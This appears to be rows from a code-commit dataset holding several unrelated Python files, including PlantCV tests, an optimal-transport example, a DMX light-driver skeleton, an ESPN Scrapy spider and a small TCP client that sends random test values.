and not isinstance(node.func.expr, astroid.Const)):
return
try:
strnode = next(func.bound.infer())
except astroid.InferenceError:
return
if not isinstance(strnode, astroid.Const):
return
if _PY3K and isinstance(strnode.value, six.binary_type):
self.add_message('ansible-no-format-on-bytestring', node=node)
return
if not isinstance(strnode.value, six.string_types):
return
if node.starargs or node.kwargs:
return
try:
fields, num_args, manual_pos = parse_format_method_string(strnode.value)
except utils.IncompleteFormatString:
return
if num_args:
self.add_message('ansible-format-automatic-specification',
node=node)
return
def register(linter):
"""required method to auto register this checker """
linter.register_checker(AnsibleStringFormatChecker(linter))
| Python | 0 | |
d6d21f6e7b8d2a44ff3406ddc9a050cc17372da8 | Add analyze_nir_intensity tests module | tests/plantcv/test_analyze_nir_intensity.py | tests/plantcv/test_analyze_nir_intensity.py | import cv2
import numpy as np
from plantcv.plantcv import analyze_nir_intensity, outputs
def test_analyze_nir(test_data):
# Clear previous outputs
outputs.clear()
# Read in test data
img = cv2.imread(test_data.small_gray_img, -1)
mask = cv2.imread(test_data.small_bin_img, -1)
_ = analyze_nir_intensity(gray_img=img, mask=mask, bins=256, histplot=True)
assert int(outputs.observations['default']['nir_median']['value']) == 117
def test_analyze_nir_16bit(test_data):
# Clear previous outputs
outputs.clear()
# Read in test data
img = cv2.imread(test_data.small_gray_img, -1)
mask = cv2.imread(test_data.small_bin_img, -1)
_ = analyze_nir_intensity(gray_img=np.uint16(img), mask=mask, bins=256, histplot=True)
assert int(outputs.observations['default']['nir_median']['value']) == 117
| Python | 0.000001 | |
9790fb109d59214ee016750307cd39b2f2780cf7 | solve increment counter | algo/incrementcounter.py | algo/incrementcounter.py | from datetime import datetime, timedelta
from time import sleep
second = timedelta(seconds=1)
day = timedelta(days=1)
class Increment:
def __init__(self):
self.last_second_count = 0
self.last_day_count = 0
self.seconds_now = datetime.now()
self.days_now = datetime.now()
def increment(self):
now = datetime.now()
if (now - self.seconds_now) >= second:
self.last_second_count = 1
self.seconds_now = now
else:
self.last_second_count += 1
if (now - self.days_now) >= day:
self.last_day_count = 1
self.days_now = now
else:
self.last_day_count += 1
def get_events_last_second(self):
return self.last_second_count
def get_events_last_day(self):
return self.last_day_count
i = Increment()
for j in range(100):
sleep(0.01)
i.increment()
print i.get_events_last_day()
print i.get_events_last_second()
| Python | 0.000124 | |
aa2b788c4d0b148ed9881da86de97965311b9cb4 | Add server.py | server.py | server.py | import socket, sys
import datetime
import time, random
TCP_IP = '72.36.65.116'
TCP_PORT = 5005
BUFFER_SIZE = 1024
if len(sys.argv) < 2:
print ("Enter the server id")
sys.exit(1)
while True:
v = random.randint(1, 10)
ts = time.time()
MESSAGE = str(v) + ";" + sys.argv[1] + ";" + datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
s.send(MESSAGE)
s.close()
print (MESSAGE)
time.sleep(5)
| Python | 0.000001 | |
287c659ad35f5036ba2687caf73009ef455c7239 | update example | examples/plot_otda_linear_mapping.py | examples/plot_otda_linear_mapping.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 20 14:31:15 2018
@author: rflamary
"""
import numpy as np
import pylab as pl
import ot
from scipy import ndimage
##############################################################################
# Generate data
# -------------
n = 1000
d = 2
sigma = .1
# source samples
angles = np.random.rand(n, 1) * 2 * np.pi
xs = np.concatenate((np.sin(angles), np.cos(angles)),
axis=1) + sigma * np.random.randn(n, 2)
xs[:n // 2, 1] += 2
# target samples
anglet = np.random.rand(n, 1) * 2 * np.pi
xt = np.concatenate((np.sin(anglet), np.cos(anglet)),
axis=1) + sigma * np.random.randn(n, 2)
xt[:n // 2, 1] += 2
A = np.array([[1.5, .7], [.7, 1.5]])
b = np.array([[4, 2]])
xt = xt.dot(A) + b
##############################################################################
# Plot data
# ---------
pl.figure(1, (5, 5))
pl.plot(xs[:, 0], xs[:, 1], '+')
pl.plot(xt[:, 0], xt[:, 1], 'o')
##############################################################################
# Estimate linear mapping and transport
# -------------------------------------
Ae, be = ot.da.OT_mapping_linear(xs, xt)
xst = xs.dot(Ae) + be
##############################################################################
# Plot transported samples
# ------------------------
pl.figure(1, (5, 5))
pl.clf()
pl.plot(xs[:, 0], xs[:, 1], '+')
pl.plot(xt[:, 0], xt[:, 1], 'o')
pl.plot(xst[:, 0], xst[:, 1], '+')
pl.show()
##############################################################################
# Load image data
# ---------------
def im2mat(I):
"""Converts and image to matrix (one pixel per line)"""
return I.reshape((I.shape[0] * I.shape[1], I.shape[2]))
def mat2im(X, shape):
"""Converts back a matrix to an image"""
return X.reshape(shape)
def minmax(I):
return np.clip(I, 0, 1)
# Loading images
I1 = ndimage.imread('../data/ocean_day.jpg').astype(np.float64) / 256
I2 = ndimage.imread('../data/ocean_sunset.jpg').astype(np.float64) / 256
X1 = im2mat(I1)
X2 = im2mat(I2)
##############################################################################
# Estimate mapping and adapt
# ----------------------------
mapping = ot.da.LinearTransport()
mapping.fit(Xs=X1, Xt=X2)
xst = mapping.transform(Xs=X1)
xts = mapping.inverse_transform(Xt=X2)
I1t = minmax(mat2im(xst, I1.shape))
I2t = minmax(mat2im(xts, I2.shape))
# %%
##############################################################################
# Plot transformed images
# -----------------------
pl.figure(2, figsize=(10, 7))
pl.subplot(2, 2, 1)
pl.imshow(I1)
pl.axis('off')
pl.title('Im. 1')
pl.subplot(2, 2, 2)
pl.imshow(I2)
pl.axis('off')
pl.title('Im. 2')
pl.subplot(2, 2, 3)
pl.imshow(I1t)
pl.axis('off')
pl.title('Mapping Im. 1')
pl.subplot(2, 2, 4)
pl.imshow(I2t)
pl.axis('off')
pl.title('Inverse mapping Im. 2')
| #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 20 14:31:15 2018
@author: rflamary
"""
import numpy as np
import pylab as pl
import ot
from scipy import ndimage
##############################################################################
# Generate data
# -------------
n = 1000
d = 2
sigma = .1
# source samples
angles = np.random.rand(n, 1) * 2 * np.pi
xs = np.concatenate((np.sin(angles), np.cos(angles)),
axis=1) + sigma * np.random.randn(n, 2)
xs[:n // 2, 1] += 2
# target samples
anglet = np.random.rand(n, 1) * 2 * np.pi
xt = np.concatenate((np.sin(anglet), np.cos(anglet)),
axis=1) + sigma * np.random.randn(n, 2)
xt[:n // 2, 1] += 2
A = np.array([[1.5, .7], [.7, 1.5]])
b = np.array([[4, 2]])
xt = xt.dot(A) + b
##############################################################################
# Plot data
# ---------
pl.figure(1, (5, 5))
pl.plot(xs[:, 0], xs[:, 1], '+')
pl.plot(xt[:, 0], xt[:, 1], 'o')
##############################################################################
# Estimate linear mapping and transport
# -------------------------------------
Ae, be = ot.da.OT_mapping_linear(xs, xt)
xst = xs.dot(Ae) + be
##############################################################################
# Plot transported samples
# ------------------------
pl.figure(1, (5, 5))
pl.clf()
pl.plot(xs[:, 0], xs[:, 1], '+')
pl.plot(xt[:, 0], xt[:, 1], 'o')
pl.plot(xst[:, 0], xst[:, 1], '+')
pl.show()
##############################################################################
# Mapping Class between images
# ----------------------------
def im2mat(I):
"""Converts and image to matrix (one pixel per line)"""
return I.reshape((I.shape[0] * I.shape[1], I.shape[2]))
def mat2im(X, shape):
"""Converts back a matrix to an image"""
return X.reshape(shape)
def minmax(I):
return np.clip(I, 0, 1)
# Loading images
I1 = ndimage.imread('../data/ocean_day.jpg').astype(np.float64) / 256
I2 = ndimage.imread('../data/ocean_sunset.jpg').astype(np.float64) / 256
X1 = im2mat(I1)
X2 = im2mat(I2)
##############################################################################
# Estimate mapping and adapt
# ----------------------------
mapping = ot.da.LinearTransport()
mapping.fit(Xs=X1, Xt=X2)
xst = mapping.transform(Xs=X1)
xts = mapping.inverse_transform(Xt=X2)
I1t = minmax(mat2im(xst, I1.shape))
I2t = minmax(mat2im(xts, I2.shape))
# %%
##############################################################################
# Plot transformed images
# -----------------------
pl.figure(2, figsize=(10, 7))
pl.subplot(2, 2, 1)
pl.imshow(I1)
pl.axis('off')
pl.title('Im. 1')
pl.subplot(2, 2, 2)
pl.imshow(I2)
pl.axis('off')
pl.title('Im. 2')
pl.subplot(2, 2, 3)
pl.imshow(I1t)
pl.axis('off')
pl.title('Mapping Im. 1')
pl.subplot(2, 2, 4)
pl.imshow(I2t)
pl.axis('off')
pl.title('Inverse mapping Im. 2')
| Python | 0.000001 |
e5f1f2a19ed86106728c4b70b1c4652ee618f918 | add skeleton for light driver | Lights/light_drv.py | Lights/light_drv.py | from threading import Thread
import logging
logger = logging.getLogger("light_drv")
DMX_RED_CHANNEL = 2
DMX_GREEN_CHANNEL = 3
DMX_BLUE_CHANNEL = 4
DMX_WHITE_CHANNEL = 5
DMX_CHANNEL_COUNT = 6 # Did we decide on another number
def init(lightQueue):
global lightThread
lightThread = LightThread(lightQueue)
lightThread.start()
def shutdown():
global lightThread
logger.info("Light driver shutdown()")
if lightThread != None:
logger.info("...Joining flame driver thread")
lightThread.shutdown()
lightThread.join()
lightThread = None
class LightThread(Thread):
def __init__(self, lightQueue):
Thread.__init__(self)
self.lightQueue = lightQueue
self.running = False
self.isConstantLightModeOn = False # Might not even need this if we only want to keep light constant when Noetica isn't moving.
self.initSerial()
self.lightEvents = list()
def start(self):
self.running = True
def shutdown(self):
self.running = False
# either turn lights off, or turn to default
def initSerial(self):
# TODO: Actually get this to work with entec code
self.ser = serial.Serial()
self.ser.baudrate = BAUDRATE
port = False
for filename in os.listdir("/dev"):
if filename.startswith("tty.usbserial"): # this is the ftdi usb cable on the Mac
port = "/dev/" + filename
logger.info("Found usb serial at " + port)
break;
elif filename.startswith("ttyUSB0"): # this is the ftdi usb cable on the Pi (Linux Debian)
port = "/dev/" + filename
logger.info("Found usb serial at " + port)
break;
if not port:
logger.exception("No usb serial connected")
return None
self.ser.port = port
self.ser.timeout = 0
self.ser.stopbits = serial.STOPBITS_ONE
self.ser.bytesize = 8
self.ser.parity = serial.PARITY_NONE
self.ser.rtscts = 0
self.ser.open()
def run(self):
self.running = True
while(self.running):
if not self.isConstantLightModeOn:
if len(self.lightEvents) > 0: # there are poofer events
# pop events off of the list. If the current time is greater than
# the time associated with the event, set up for serial
event = self.lightEvents.pop(0)
currentTime = time.time()
firingTime = event["time"]
if firingTime < currentTime:
if not currentTime - firingTime > 2000: #If it's more than two seconds in the past, ignore it
self.firePoofers(event["bangCommandList"])
else:
self.lightEvents.insert(0, event)
if len(self.lightEvents) > 0: # there are poofer events in the future
waitTime = self.lightEvents[0]["time"] - time.time()
else:
waitTime = PooferFiringThread.TIMEOUT
try:
cmd = self.lightQueue.get(True, waitTime)
logger.debug("Received Message on cmd queue!")
# parse message. If this is a request to do a flame sequence,
# set up poofer events, ordered by time. Event["time"] attribute
# should be current time (time.time()) plus the relative time from
# the start of the sequence
msgObj = json.loads(cmd)
type = msgObj["cmdType"]
logger.debug("message is {}".format(msgObj))
if type == "stop":
self.stopAll()
elif type == "resume":
self.resumeAll()
elif type == "setToConstant":
self.isConstantLightModeOn = True
self.setConstantLight(msgObj)
elif type == "stopConstant":
self.isConstantLightModeOn = False
elif type == "setColorPattern":
self.setColorPattern(msgObj)
except Queue.Empty:
# this is just a timeout - completely expected. Run the loop
pass
except Exception:
logger.exception("Unexpected exception processing command queue!")
def setConstantLight(self, msgObj):
# TODO: set constant light
pass
def setColorPattern(self, msgObj):
# gets passed a color pattern {red:<int>, green:<int>, blue:<int> }
# and does something with it.
| Python | 0 | |
dcca93fbb66e5cd8bf0e0500aca3f187922e8806 | Add in team id spider | scrapy_espn/scrapy_espn/spiders/team_spider.py | scrapy_espn/scrapy_espn/spiders/team_spider.py | import scrapy
class TeamSpider(scrapy.Spider):
name = "team"
start_urls = [
'http://www.espn.com/mens-college-basketball/teams',
]
def parse(self, response):
for conf in response.css('ul'):
for team in conf.css('li'):
yield {
'team':team.css('h5 a::text').extract(),
'id':team.css('h5 a::attr(href)').extract()[0].split('/')[7]
} | Python | 0 | |
4eb6c05df9b8faf4492b23db1ef0e2aee141d24b | test case for tpt | emma2/msm/analysis/api_test.py | emma2/msm/analysis/api_test.py | '''
Created on 18.10.2013
@author: marscher
'''
import unittest
import emma2.msm.analysis.api as api
import numpy as np
class Test(unittest.TestCase):
def testTPT(self):
A = np.ndarray([1, 2, 3], dtype=int)
B = np.ndarray([4, 2], dtype=int)
T = np.ndarray([[ 0.5, 0, 0.5, 0],
[0, 0.5, 0.5, 0],
[1 / 3., 1 / 3., 0, 1 / 3.],
[0, 0, 1, 0]], shape=(4,4), dtype=np.double)
itpt = api.tpt(T, A, B)
print "flux: ", itpt.getFlux()
print "net flux: ", itpt.getNetFlux()
print "total flux: ", itpt.getTotalFlux()
print "forward committor", itpt.getForwardCommittor()
print "backward committor", itpt.getBackwardCommitor()
if __name__ == "__main__":
unittest.main()
| Python | 0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.